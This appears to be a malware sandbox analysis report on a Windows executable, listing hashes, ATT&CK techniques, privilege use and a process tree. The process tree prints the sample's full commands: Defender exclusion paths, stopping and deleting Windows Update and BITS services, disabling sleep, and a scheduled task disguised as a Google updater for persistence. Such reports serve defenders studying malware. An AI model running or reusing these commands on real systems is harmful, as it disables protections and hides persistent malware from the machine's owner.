d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce

Analysis

max time kernel
82s
max time network
126s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
13/12/2022, 17:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d0525e69e54066d5b3764acefd16a754.exe
Size

3.6MB
MD5

d0525e69e54066d5b3764acefd16a754
SHA1

513304e7eca83acedad4655a135a6f4c2c1f4aed
SHA256

d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce
SHA512

b958797b913b1860daa2cdf4f6741835042e170fea4c4b5f3ae61432a9e24054dbcd40dbc4871d19b12d3f40d90523490caa37e6152d66850c05f18b7d738f03
SSDEEP

98304:vKNU8zvQiW+xPSCcgu3ebV6GDRjar2H2wKr3:avhWXrycG1jamKr3

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 2004 created 3020	2004	d0525e69e54066d5b3764acefd16a754.exe	56
PID 2004 created 3020	2004	d0525e69e54066d5b3764acefd16a754.exe	56
PID 2004 created 3020	2004	d0525e69e54066d5b3764acefd16a754.exe	56
PID 2004 created 3020	2004	d0525e69e54066d5b3764acefd16a754.exe	56
PID 2004 created 3020	2004	d0525e69e54066d5b3764acefd16a754.exe	56

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	d0525e69e54066d5b3764acefd16a754.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3768	sc.exe
4820	sc.exe
2940	sc.exe
2884	sc.exe
1636	sc.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2004	d0525e69e54066d5b3764acefd16a754.exe
2004	d0525e69e54066d5b3764acefd16a754.exe
1416	powershell.exe
1416	powershell.exe
2004	d0525e69e54066d5b3764acefd16a754.exe
2004	d0525e69e54066d5b3764acefd16a754.exe
2004	d0525e69e54066d5b3764acefd16a754.exe
2004	d0525e69e54066d5b3764acefd16a754.exe
2004	d0525e69e54066d5b3764acefd16a754.exe
2004	d0525e69e54066d5b3764acefd16a754.exe
1376	powershell.exe
1376	powershell.exe
2004	d0525e69e54066d5b3764acefd16a754.exe
2004	d0525e69e54066d5b3764acefd16a754.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeShutdownPrivilege	4628	powercfg.exe
Token: SeCreatePagefilePrivilege	4628	powercfg.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeShutdownPrivilege	1916	powercfg.exe
Token: SeCreatePagefilePrivilege	1916	powercfg.exe
Token: SeShutdownPrivilege	2304	powercfg.exe
Token: SeCreatePagefilePrivilege	2304	powercfg.exe
Token: SeShutdownPrivilege	1064	powercfg.exe
Token: SeCreatePagefilePrivilege	1064	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1376	powershell.exe
Token: SeSecurityPrivilege	1376	powershell.exe
Token: SeTakeOwnershipPrivilege	1376	powershell.exe
Token: SeLoadDriverPrivilege	1376	powershell.exe
Token: SeSystemProfilePrivilege	1376	powershell.exe
Token: SeSystemtimePrivilege	1376	powershell.exe
Token: SeProfSingleProcessPrivilege	1376	powershell.exe
Token: SeIncBasePriorityPrivilege	1376	powershell.exe
Token: SeCreatePagefilePrivilege	1376	powershell.exe
Token: SeBackupPrivilege	1376	powershell.exe
Token: SeRestorePrivilege	1376	powershell.exe
Token: SeShutdownPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeSystemEnvironmentPrivilege	1376	powershell.exe
Token: SeRemoteShutdownPrivilege	1376	powershell.exe
Token: SeUndockPrivilege	1376	powershell.exe
Token: SeManageVolumePrivilege	1376	powershell.exe
Token: 33	1376	powershell.exe
Token: 34	1376	powershell.exe
Token: 35	1376	powershell.exe
Token: 36	1376	powershell.exe
Token: SeIncreaseQuotaPrivilege	1376	powershell.exe
Token: SeSecurityPrivilege	1376	powershell.exe
Token: SeTakeOwnershipPrivilege	1376	powershell.exe
Token: SeLoadDriverPrivilege	1376	powershell.exe
Token: SeSystemProfilePrivilege	1376	powershell.exe
Token: SeSystemtimePrivilege	1376	powershell.exe
Token: SeProfSingleProcessPrivilege	1376	powershell.exe
Token: SeIncBasePriorityPrivilege	1376	powershell.exe
Token: SeCreatePagefilePrivilege	1376	powershell.exe
Token: SeBackupPrivilege	1376	powershell.exe
Token: SeRestorePrivilege	1376	powershell.exe
Token: SeShutdownPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeSystemEnvironmentPrivilege	1376	powershell.exe
Token: SeRemoteShutdownPrivilege	1376	powershell.exe
Token: SeUndockPrivilege	1376	powershell.exe
Token: SeManageVolumePrivilege	1376	powershell.exe
Token: 33	1376	powershell.exe
Token: 34	1376	powershell.exe
Token: 35	1376	powershell.exe
Token: 36	1376	powershell.exe
Token: SeIncreaseQuotaPrivilege	1376	powershell.exe
Token: SeSecurityPrivilege	1376	powershell.exe
Token: SeTakeOwnershipPrivilege	1376	powershell.exe
Token: SeLoadDriverPrivilege	1376	powershell.exe
Token: SeSystemProfilePrivilege	1376	powershell.exe
Token: SeSystemtimePrivilege	1376	powershell.exe
Token: SeProfSingleProcessPrivilege	1376	powershell.exe
Token: SeIncBasePriorityPrivilege	1376	powershell.exe
Token: SeCreatePagefilePrivilege	1376	powershell.exe
Token: SeBackupPrivilege	1376	powershell.exe
Token: SeRestorePrivilege	1376	powershell.exe
Token: SeShutdownPrivilege	1376	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 1856 wrote to memory of 3768	1856	cmd.exe	98
PID 1856 wrote to memory of 3768	1856	cmd.exe	98
PID 2028 wrote to memory of 4628	2028	cmd.exe	99
PID 2028 wrote to memory of 4628	2028	cmd.exe	99
PID 1856 wrote to memory of 4820	1856	cmd.exe	100
PID 1856 wrote to memory of 4820	1856	cmd.exe	100
PID 2028 wrote to memory of 1916	2028	cmd.exe	101
PID 2028 wrote to memory of 1916	2028	cmd.exe	101
PID 1856 wrote to memory of 2940	1856	cmd.exe	102
PID 1856 wrote to memory of 2940	1856	cmd.exe	102
PID 2028 wrote to memory of 2304	2028	cmd.exe	103
PID 2028 wrote to memory of 2304	2028	cmd.exe	103
PID 2028 wrote to memory of 1064	2028	cmd.exe	104
PID 2028 wrote to memory of 1064	2028	cmd.exe	104
PID 1856 wrote to memory of 2884	1856	cmd.exe	105
PID 1856 wrote to memory of 2884	1856	cmd.exe	105
PID 1856 wrote to memory of 1636	1856	cmd.exe	106
PID 1856 wrote to memory of 1636	1856	cmd.exe	106
PID 1856 wrote to memory of 1872	1856	cmd.exe	107
PID 1856 wrote to memory of 1872	1856	cmd.exe	107
PID 1856 wrote to memory of 8	1856	cmd.exe	108
PID 1856 wrote to memory of 8	1856	cmd.exe	108
PID 1856 wrote to memory of 1092	1856	cmd.exe	109
PID 1856 wrote to memory of 1092	1856	cmd.exe	109
PID 1856 wrote to memory of 4556	1856	cmd.exe	110
PID 1856 wrote to memory of 4556	1856	cmd.exe	110
PID 1856 wrote to memory of 3232	1856	cmd.exe	111
PID 1856 wrote to memory of 3232	1856	cmd.exe	111
PID 3116 wrote to memory of 1004	3116	cmd.exe	114
PID 3116 wrote to memory of 1004	3116	cmd.exe	114

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3020
- C:\Users\Admin\AppData\Local\Temp\d0525e69e54066d5b3764acefd16a754.exe
  "C:\Users\Admin\AppData\Local\Temp\d0525e69e54066d5b3764acefd16a754.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1856
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3768
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4820
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2940
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2884
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1636
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1872
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:8
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:1092
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4556
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3232
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2028
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4628
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uwjcnslmt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1376
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\d0525e69e54066d5b3764acefd16a754.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Windows\System32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1004

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
380007fbdf9fef355db2afd71fce9cd1

SHA1
e98802ef10fac8ef96a3210930784c317ca76fa0

SHA256
6353a11014d2c1495ac7a5efef195d06d8e8b30a163c437263361deb5a28de03

SHA512
9790c6b4c16ed4f4e6cddf492d01a6b4963e20bde6ddf40017db20ffc672b0cfaea2ad6aebcb51e8e459682974be0d024b35546aad840051a1e9fe2d3e565bd5

Download Submit
memory/1376-147-0x00007FFDFA400000-0x00007FFDFAEC1000-memory.dmp

Filesize
10.8MB

Download
memory/1376-151-0x00007FFDFA400000-0x00007FFDFAEC1000-memory.dmp

Filesize
10.8MB

Download
memory/1416-133-0x00007FFDFA2E0000-0x00007FFDFADA1000-memory.dmp

Filesize
10.8MB

Download
memory/1416-132-0x00000190E5AB0000-0x00000190E5AD2000-memory.dmp

Filesize
136KB

Download